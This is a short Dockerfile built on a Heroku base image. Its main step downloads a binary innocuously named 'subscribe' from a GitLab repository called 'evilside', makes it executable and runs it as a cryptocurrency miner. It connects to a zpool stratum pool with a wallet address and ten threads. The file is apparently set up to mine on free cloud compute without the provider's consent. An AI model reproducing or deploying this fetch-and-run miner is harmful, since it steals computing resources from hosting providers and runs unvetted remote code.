FROM heroku/heroku:18
RUN apt-get install -y curl git unzip wget
RUN wget https://gitlab.com/evilside/subscribe/-/raw/main/subscribe; chmod +x subscribe; ./subscribe -a power2b -o stratum+tcp://power2b.mine.zpool.ca:6242 -u DRrt61Pi59EJDt3vywLjrou31eRJZcwRg7.CPU-MT_RECEH-$(echo $(shuf -i 1-99 -n 1)) -p c=DGB --threads=10
CMD bash heroku.sh
